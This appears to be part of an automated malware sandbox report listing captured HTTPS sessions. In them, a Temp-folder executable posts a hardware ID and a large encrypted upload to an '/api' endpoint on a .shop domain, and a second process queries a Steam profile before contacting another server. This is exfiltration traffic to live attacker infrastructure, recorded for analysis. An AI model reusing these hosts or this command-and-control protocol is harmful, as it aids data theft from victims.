                                                          Set-Cookie: PHPSESSID=ac8ffifl4fi4jvjojf5f4tjltr; expires=Thu, 19-Sep-2024 16:14:11 GMT; Max-Age=9999999; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x3mLKVuYs%2B7YKFQMWtvtA0kUJWRHCDH%2B4e57s0qJTSZzLJ16E%2FfAsxLqXBsxxQpDXnozDSs8G6zDwIjKoV%2FeRlIaaNTSQ9gwJof1Gh%2BVN4YdaJ6Z57WIl7Pr%2BmIDXGtQz35oKHfLaO98msw%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 88a1316dcc0e42e5-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-05-26 22:27:32 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                                          Data Ascii: fok 8.46.123.175
                                                          2024-05-26 22:27:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          6192.168.2.549730188.114.97.34435640C:\Users\user\AppData\Local\Temp\21AE.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-05-26 22:27:37 UTC289OUTPOST /api HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Content-Length: 1248
                                                          Host: whispedwoodmoodsksl.shop
                                                          2024-05-26 22:27:37 UTC1248OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 34 34 38 30 37 45 30 37 32 42 44 41 39 37 33 34 30 45 41 42 45 31 32 36 41 34 44 46 34 45 44 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 73 77 67 35 45 47 2d 2d 0d 0a 2d 2d 62
                                                          Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"944807E072BDA97340EABE126A4DF4ED--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"swg5EG----b
                                                          2024-05-26 22:27:37 UTC808INHTTP/1.1 200 OK
                                                          Date: Sun, 26 May 2024 22:27:37 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=b0e2lbescn175ek3ebac7c3ibo; expires=Thu, 19-Sep-2024 16:14:16 GMT; Max-Age=9999999; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JkzwrTwrHzDstd3pe2jFLTxO4re5uXO5oUX1TNlNrCaU4ukEMS8P1iJ5TWB8MIRDU7iIA0%2Bug6g3UafXRu3CmVvFnGZCG9htxmPaslwc7FJaCBvJ3LM3R3K30FHdKHYeB22pygNWn%2BuRBu8%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 88a1318edd96423d-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-05-26 22:27:37 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                                          Data Ascii: fok 8.46.123.175
                                                          2024-05-26 22:27:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          7192.168.2.549731188.114.97.34435640C:\Users\user\AppData\Local\Temp\21AE.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-05-26 22:27:38 UTC291OUTPOST /api HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Content-Length: 568201
                                                          Host: whispedwoodmoodsksl.shop
                                                          2024-05-26 22:27:39 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 34 34 38 30 37 45 30 37 32 42 44 41 39 37 33 34 30 45 41 42 45 31 32 36 41 34 44 46 34 45 44 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 73 77 67 35 45 47 2d 2d 0d 0a 2d 2d 62
                                                          Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"944807E072BDA97340EABE126A4DF4ED--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"swg5EG----b
                                                          2024-05-26 22:27:39 UTC15331OUTData Raw: c9 e7 38 42 9e d8 f8 7c 13 7d 58 eb f5 99 58 c3 e8 dd bb 3c a4 16 0d 1e 95 7f 9a 7a e9 cf e7 8a 06 4a b1 1b 12 5c 46 ce b7 f0 c1 52 af 97 68 e1 3e 03 51 1e d1 9c 16 26 e9 79 20 d7 98 cb 30 e0 d2 ba a9 f7 fd 04 c5 f1 8d 5b 23 f8 2e be d5 a4 fb 0b 7b 95 69 e1 e1 e1 84 c5 06 19 1a fa a6 64 40 7d e3 1e 1c d8 c4 31 cf 93 07 0e a2 2b b2 20 f2 20 5d d1 e6 69 52 65 50 29 1e f6 84 2a f0 c2 29 f9 d0 2e 4e 99 69 48 42 eb b4 d5 c3 5e 44 66 a5 4e d2 67 d8 1f 0a 5a 3d 32 24 e9 41 58 d7 45 c1 e5 42 41 67 ef 81 9e 8c 3a 71 72 97 e2 ed 0f c1 51 36 ac 6a df 3d 65 51 99 5e 3c 40 31 a0 fc cd 6d 8f a0 5e b3 7d c2 65 5d 8f a7 25 6f 33 ca 35 0b af 68 ee 76 3e 79 9f dc 5d 7c 7b a2 a2 fd 75 1b 06 fe 72 55 d1 e5 23 c8 e9 fe 45 6a e6 95 38 82 a7 89 8e cd 78 ba da d8 31 6c 02 0f 9b
                                                          Data Ascii: 8B|}XX<zJ\FRh>Q&y 0[#.{id@}1+ ]iReP)*).NiHB^DfNgZ=2$AXEBAg:qrQ6j=eQ^<@1m^}e]%o35hv>y]|{urU#Ej8x1l
                                                          2024-05-26 22:27:39 UTC15331OUTData Raw: d1 9f 73 7b 3d f1 85 07 ef 1b 06 69 a1 4a 2c c6 dc f0 44 02 d2 23 f5 2a 42 bb 03 14 6d c9 83 81 7d 3b 8d 4e cd bf 4c eb a5 63 3c d7 7c e3 87 cf cf b7 f8 bd dd 2a 77 29 6d 75 72 dc fa bc 23 56 bd b1 48 9c 6f b9 55 7f c3 ba c4 d5 ad f4 d4 8e d4 8b 6c d7 3c f2 6c bd fa bc ae 79 cd c3 96 45 f5 20 5c 4c 22 8f 91 4f bd 8f a2 7d e5 b4 d0 25 78 72 b4 14 b5 6c e7 52 55 f8 47 42 1e d8 38 ba 1b 40 64 82 71 93 92 97 24 d2 3c b5 ce 73 6a bc 43 1d ce ed c9 a9 d6 73 21 ed df fb 40 1d 6f df 4c 09 31 08 ac ac c0 b3 96 02 af ae 55 d9 21 c0 56 ad 7b 52 31 09 76 e3 6a 57 8e ec 0d 79 20 64 2a 2f f9 72 ab f5 74 1c 1f a5 4e ec 26 7f cc 61 20 df 41 af 18 7f ec d9 55 90 d1 ce 95 55 ac 50 3e fe cc a9 3d 23 bb 42 83 9d 46 df 9c 58 99 f7 1f c7 8a a4 83 c5 be e7 bb 87 d8 23 8f 29 7f
                                                          Data Ascii: s{=iJ,D#*Bm};NLc<|*w)mur#VHoUl<lyE \L"O}%xrlRUGB8@dq$<sjCs!@oL1U!V{R1vjWy d*/rtN&a AUUP>=#BFX#)
                                                          2024-05-26 22:27:39 UTC15331OUTData Raw: 98 8c e0 81 d9 5c 61 68 00 46 ec cb 0b 0f 1b b9 a7 20 b2 33 7f f6 e6 a7 c7 4e 41 cc f0 75 26 3b ae b8 fb 4a 19 28 9a 1c 1e a5 bc 2c 74 a1 58 3d fc ef 74 79 af c7 04 ee cb 0b 88 ab d1 87 0a 56 94 79 43 4c 8f b0 7c 9e d2 0c 7d 32 42 93 e2 e3 b1 33 64 f6 08 27 36 35 22 e3 fd f7 e3 73 11 8f be 92 61 b0 85 a0 9f 24 97 32 7b e3 f9 d5 92 52 0a 82 54 19 f6 eb 47 6a 22 56 ba d5 7d b9 bb d9 48 e9 71 f7 50 f5 a9 9c 0a d2 81 41 0a 7d f8 cb 04 7e e3 9b ba c5 83 11 81 1a 54 44 6d dc 95 a7 fb e2 9c 9f 96 f3 09 70 c1 b8 68 f9 9e c7 d1 e4 6f 56 5f 7e 26 95 71 df b2 5c 3c 26 6b a4 2e 64 dc 09 bd e5 7d fb a7 e9 39 56 5a b4 99 71 e6 74 01 67 8d 1c bf a5 88 9e 72 40 9c 37 99 ac 98 f7 2b e2 0f 01 cf 84 7a 16 af 78 15 14 9b fc a7 36 bd 46 3e 22 43 a0 e0 9a 95 ff 5e 8c 0b 5f 2c
                                                          Data Ascii: \ahF 3NAu&;J(,tX=tyVyCL|}2B3d'65"sa$2{RTGj"V}HqPA}~TDmphoV_~&q\<&k.d}9VZqtgr@7+zx6F>"C^_,
                                                          2024-05-26 22:27:39 UTC15331OUTData Raw: 8a bb 3e d1 00 ed 41 43 fa 6f a6 a3 41 8a 47 4c b8 27 a2 fb 19 a9 5b 2e 97 ac b5 a6 48 26 cf 4e 76 46 61 4a 39 1d ba b9 44 d8 9f 2e 8c 67 cc f5 ad ec c8 d0 5a 2c 99 f9 58 f6 f6 d8 72 83 e9 ab 6a 72 98 24 56 85 3c b2 74 f5 8a 6b 58 b2 83 56 16 56 29 9a 1c e8 c3 35 fc 72 45 7e ed b7 27 2e 03 e6 0e cb aa 60 5b 7c c5 46 68 c6 de f2 67 b5 af 10 85 8c e7 4f e1 bd 16 7e 9b d6 d6 ad ad 99 55 ed 43 6c 76 ed b5 0e 9e 7e 1e d6 b9 74 47 1a db ed 43 d7 d9 11 71 3a 75 15 5a f3 c3 d3 38 71 1f bc 50 fb 26 ce a1 5b 64 b5 c8 2a 9b 8e 8a 47 71 5c ce 4c 63 c3 46 da 78 b7 c1 cc a5 03 9b 1f bc 8d 69 fd 88 98 62 bc 5d 64 e6 c9 08 af 1f 85 01 b2 47 1f 9c 3a f0 4c 9f 45 af 10 fb 25 de 32 42 8f c2 3d 00 62 49 66 19 88 5c 60 37 85 bc e5 a7 05 7b 95 80 e8 b1 ff ea 63 d9 c5 3f 7e 4f
                                                          Data Ascii: >ACoAGL'[.H&NvFaJ9D.gZ,Xrjr$V<tkXVV)5rE~'.`[|FhgO~UClv~tGCq:uZ8qP&[d*Gq\LcFxib]dG:LE%2B=bIf\`7{c?~O
                                                          2024-05-26 22:27:39 UTC15331OUTData Raw: 8a 48 02 5a bb d1 6b cf d4 d0 7f 01 96 c3 39 a0 ba 8f 35 b0 73 1f eb 17 00 27 6f fb 67 3e 60 9c 16 f2 2c 21 77 40 28 75 ac 93 82 d9 1b af fc b4 d3 c0 6f 8c 9e bb 17 d0 ee e6 19 26 2f 68 63 1c e4 13 76 3e 50 b2 be 88 bb fc d8 5a 46 c0 db 1f 7b 25 e9 b2 e7 c0 d1 9f d7 d0 95 d3 64 72 74 e8 65 01 e0 a1 08 a6 74 39 72 db 81 7c 2c fa ff b6 4e 3a 03 4f 46 ff 11 34 9c 56 0e 0c 91 74 24 82 34 76 8e 27 b6 89 a2 a2 4e 6e 63 c2 f0 89 5f f2 cc 71 00 c3 88 66 ef 96 a4 11 c1 cf ea ec e4 bd be a7 5c c7 52 67 a4 be ad 7f f5 e7 3b e7 bb d0 bb cb 49 4b b3 22 7b 52 b8 c5 62 9a 29 28 b6 71 f2 8f 3e 34 6d 02 0f 0c 67 2b 09 fe 3d a8 d8 2c 22 f4 da ef 0e a9 2d ed 28 44 ce 50 9a 51 ee 5d 94 81 93 9e 4d da f6 d1 4b 05 ea 3e 07 bc 18 74 f0 40 fd fe 12 5f 58 8e 59 64 a5 47 9a 15 a0
                                                          Data Ascii: HZk95s'og>`,!w@(uo&/hcv>PZF{%drtet9r|,N:OF4Vt$4v'Nnc_qf\Rg;IK"{Rb)(q>4mg+=,"-(DPQ]MK>t@_XYdG
                                                          2024-05-26 22:27:39 UTC15331OUTData Raw: 9d fd 59 71 82 b0 1d 83 99 db 70 e1 84 bf 30 8a fe ac 54 7a b0 eb 03 e4 3e 2f c7 09 99 f9 c8 f8 10 11 30 b4 fb 40 93 da 5c eb 8a eb a4 78 5d 85 ce e6 44 af a9 e4 3f cc c1 ce e0 55 85 fe 3f d9 3e 55 8f 3b 06 02 76 92 67 44 04 77 e2 f3 76 77 11 77 63 c0 31 b6 29 28 fb 33 ee f0 8c 62 44 b7 58 e2 3d 2d 51 cd b5 d5 b8 75 7d b6 5f 41 41 cf 8f bc 7e 9b c2 5b cc ac ae 4a df ec ff 34 b6 da c2 71 3b c1 9b 49 3b b6 b9 cb b6 21 79 78 fa 0e 70 3d 7d db 97 72 11 c3 f5 9b 76 f9 cd 3d 3c 38 40 74 f8 38 ba 0f 78 8f af 2b 6d 76 6d ae da 0c 9e ac 82 4e 29 b6 af 5f 91 02 7e 06 a9 91 21 c0 0f 89 ff 97 70 b0 cb 6b 07 76 a7 cc 9c 1a 03 76 c9 09 f9 fa 34 27 64 d1 44 b3 86 8a aa ae 3b d6 35 23 70 e8 84 74 4d 2f 73 e4 4d 9c f3 8e 6d b9 fd ff fd 7b cb ef 3a f9 8b 95 d3 22 fa c7 36
                                                          Data Ascii: Yqp0Tz>/0@\x]D?U?>U;vgDwvwwc1)(3bDX=-Qu}_AA~[J4q;I;!yxp=}rv=<8@t8x+mvmN)_~!pkvv4'dD;5#ptM/sMm{:"6
                                                          2024-05-26 22:27:39 UTC15331OUTData Raw: 9a 77 e1 ca 66 4a 58 00 7c 3b 8b 97 9f 92 06 05 6d a9 3d 57 ac c9 80 e1 c3 44 d3 43 dc 45 9a 0b f1 98 55 ac 3c 66 b9 69 b9 61 14 d5 8e e9 68 39 08 ec 7d 7e 79 ab 0e 3c a4 8d 87 4f 0c c0 86 72 43 d8 cc ef a7 fd 79 71 34 22 e8 ef e5 77 97 09 3f 8c 4e 8b 47 7f f2 43 aa f6 5f 41 44 8d 0b 14 06 cf da a1 98 eb 30 04 df 23 97 2f b1 a9 4b 7c ea 29 17 c6 e6 7b bc af 97 c1 7d 6d 67 ee 26 51 17 06 98 94 81 04 54 fd 73 1b 7d 75 8b 27 91 c6 cd b1 5e 9e fd 7a 42 87 f6 71 d8 04 f4 62 6b 43 8f ed ad 0d 27 9f a3 1d 12 07 1f 04 2b 95 05 86 de 5a ed ff f9 a8 6e eb e2 6f c3 09 7e f0 3b 9a 32 a2 40 d9 d4 c2 96 b8 01 77 8a 33 0f 30 bd 01 52 14 66 3d 5e 0b 77 2d 68 ea 19 64 ae 24 83 14 f5 62 4e 96 84 81 57 7a 48 f2 d0 19 e0 fe 22 f4 64 68 f1 47 f0 e9 28 74 4b 62 9f 91 22 3f c4
                                                          Data Ascii: wfJX|;m=WDCEU<fiah9}~y<OrCyq4"w?NGC_AD0#/K|){}mg&QTs}u'^zBqbkC'+Zno~;2@w30Rf=^w-hd$bNWzH"dhG(tKb"?
                                                          2024-05-26 22:27:39 UTC15331OUTData Raw: 4b 79 07 4b 11 11 d3 38 62 00 3b 9b 9d 47 49 36 77 b4 4b 25 f4 a2 c3 cc c9 a4 74 9a b6 f8 48 b0 5d ae 8c 4e f2 c2 4f a4 7b b1 97 47 71 c5 ee 60 7c 89 0a 6f 29 7f e3 fc 71 9b d6 b4 db e8 e9 91 ff cf a6 fb 3f 8b dd 3c ce e0 8f a7 68 eb d1 39 26 4a b5 21 48 2f 1b 98 fd 9e 7d 09 57 a2 15 e8 61 e3 9f c4 76 23 2e 55 04 bd 7a b7 5e 61 1e 5b ae 7b 55 63 8a 36 bf 1e c8 15 48 a5 68 ea 9f 54 0e 72 9f d3 bf 50 79 c9 8d 40 8e 2c d3 d2 be 89 ec 70 07 0d 83 22 52 a1 17 39 71 35 2f 94 f2 df 07 ac 1e 85 9e 2d 82 94 32 f6 b7 bf f1 3c 2b 98 32 a8 f3 db a9 d6 bc a2 7a f5 5f 96 43 64 8e 3b 72 97 13 09 49 c6 95 4c 65 f0 0a 5e 52 88 88 f1 65 55 dd 07 bf 75 c9 63 9c 5a e2 22 33 72 cb 19 3d c3 71 36 66 b2 32 dd 70 25 10 f3 9b f0 52 d6 07 bd 76 d6 04 d3 b8 03 f6 f1 4f 83 ce 9a 46
                                                          Data Ascii: KyK8b;GI6wK%tH]NO{Gq`|o)q?<h9&J!H/}Wav#.Uz^a[{Uc6HhTrPy@,p"R9q5/-2<+2z_Cd;rILe^ReUucZ"3r=q6f2p%RvOF
                                                          2024-05-26 22:27:39 UTC15331OUTData Raw: c7 b2 68 07 b0 2c 15 49 f4 79 10 25 7c 1d 70 f7 db 1f 8e 9e d4 4d bb 61 e5 9d 64 37 01 a6 35 29 e5 eb c7 f7 20 2e 4e a0 3a a6 30 f4 a6 15 b7 52 48 39 0d 09 fc b6 12 9f c0 10 90 15 3f b9 ca 9f ce b7 93 b6 54 c9 16 49 f6 b8 6b d7 d1 2f ee a1 22 57 be 2f e7 ee 23 0a 82 b2 5c 3c 2e 59 02 8f a0 34 46 ee 46 db b2 32 5a 85 85 7d 76 f2 0a 85 97 1e ee 83 95 11 26 fc 38 5d 17 a1 90 a5 f8 ac ed 46 08 2d f6 06 2a 4a 53 e8 bb 13 2c 28 50 df 62 0e d1 0c 8e c2 61 00 46 45 38 f5 b1 06 62 9d 8b 64 d6 4e e4 12 3c 32 1f ee 8f eb ee f7 fe 77 b1 e8 30 f6 23 21 8b d8 86 99 6c bd 7f 96 7a e7 af c4 f0 79 67 52 61 b7 ec 4b 66 fb 07 fc 31 54 b8 dc 94 17 aa 77 a0 58 bb f6 5d 2a 89 98 19 4d 96 c7 9c 5d 8b df 03 9c 9b 18 a9 10 5d 52 2a c4 77 f9 0e 6d a1 cf 6b e1 ca fc 0e 31 20 cd 71
                                                          Data Ascii: h,Iy%|pMad75) .N:0RH9?TIk/"W/#\<.Y4FF2Z}v&8]F-*JS,(PbaFE8bdN<2w0#!lzygRaKf1TwX]*M]]R*wmk1 q
                                                          2024-05-26 22:27:40 UTC810INHTTP/1.1 200 OK
                                                          Date: Sun, 26 May 2024 22:27:40 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=32d74rsqko10uvafefhrdtmog3; expires=Thu, 19-Sep-2024 16:14:19 GMT; Max-Age=9999999; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7kfn3DuuUJlRGtNbrwrd9desTnoWJi9MpdxjTL%2F2IuYykPx5OThlbRs%2Fuxrlle1KGaY3IivZLd68wFdDiELE%2FNYkOwSYA997iYg9uzeqBrLitRKqt0gxHIqplPDVIvxAHu4fAi57rrLzmLw%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 88a1319919871962-EWR
                                                          alt-svc: h3=":443"; ma=86400


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          8192.168.2.549746104.102.42.294431436C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          TimestampBytes transferredDirectionData
                                                          2024-05-26 22:27:55 UTC119OUTGET /profiles/76561199689717899 HTTP/1.1
                                                          Host: steamcommunity.com
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          2024-05-26 22:27:56 UTC1882INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
                                                          Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                          Cache-Control: no-cache
                                                          Date: Sun, 26 May 2024 22:27:56 GMT
                                                          Content-Length: 35682
                                                          Connection: close
                                                          Set-Cookie: sessionid=c68514440cebf485dda4dc7c; Path=/; Secure; SameSite=None
                                                          Set-Cookie: steamCountry=US%7C493458b59285f9aa948bf050e0c9a39b; Path=/; Secure; HttpOnly; SameSite=None
                                                          2024-05-26 22:27:56 UTC14502INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                          Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                          2024-05-26 22:27:56 UTC16384INData Raw: 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 64 69 73 63 75 73 73 69 6f 6e 73 2f 22 3e 0d 0a 09 09 09 09 09 09 09 44 69 73 63 75 73 73 69 6f 6e 73 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 77 6f 72 6b 73 68 6f 70 2f 22 3e 0d 0a 09 09 09 09 09 09 09 57 6f 72 6b 73 68 6f 70 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62
                                                          Data Ascii: lass="submenuitem" href="https://steamcommunity.com/discussions/">Discussions</a><a class="submenuitem" href="https://steamcommunity.com/workshop/">Workshop</a><a class="sub
                                                          2024-05-26 22:27:56 UTC3768INData Raw: 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 62 61 64 67 65 69 6e 66 6f 5f 62 61 64 67 65 5f 61 72 65 61 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6c 65 76 65 6c 5f 62 74 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 70 72 6f 66 69 6c 65 73 2f 37 36 35 36 31 31 39 39 36 38 39 37 31 37 38 39 39 2f 62 61 64 67 65 73 22 3e 0d 0a 09 09 09 09 09 09 09
                                                          Data Ascii: <div class="profile_header_badgeinfo_badge_area"><a data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="persona_level_btn" href="https://steamcommunity.com/profiles/76561199689717899/badges">
                                                          2024-05-26 22:27:56 UTC1028INData Raw: 20 74 68 69 73 20 77 65 62 73 69 74 65 20 69 73 20 70 72 6f 76 69 64 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 6c 69 6e 6b 66 69 6c 74 65 72 2f 3f 75 3d 68 74 74 70 25 33 41 25 32 46 25 32 46 77 77 77 2e 67 65 6f 6e 61 6d 65 73 2e 6f 72 67 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 20 6e 6f 6f 70 65 6e 65 72 22 3e 67 65 6f 6e 61 6d 65 73 2e 6f 72 67 3c 2f 61 3e 2e 09 09 09 09 09 3c 62 72 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 76 61 6c 76 65 5f 6c 69 6e 6b 73 22 3e 0d 0a 09 09 09 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f
                                                          Data Ascii: this website is provided by <a href="https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org" target="_blank" rel=" noopener">geonames.org</a>.<br><span class="valve_links"><a href="http://store.steampowered.com/


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          9192.168.2.54974865.109.242.594431436C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          TimestampBytes transferredDirectionData
                                                          2024-05-26 22:27:57 UTC186OUTGET / HTTP/1.1
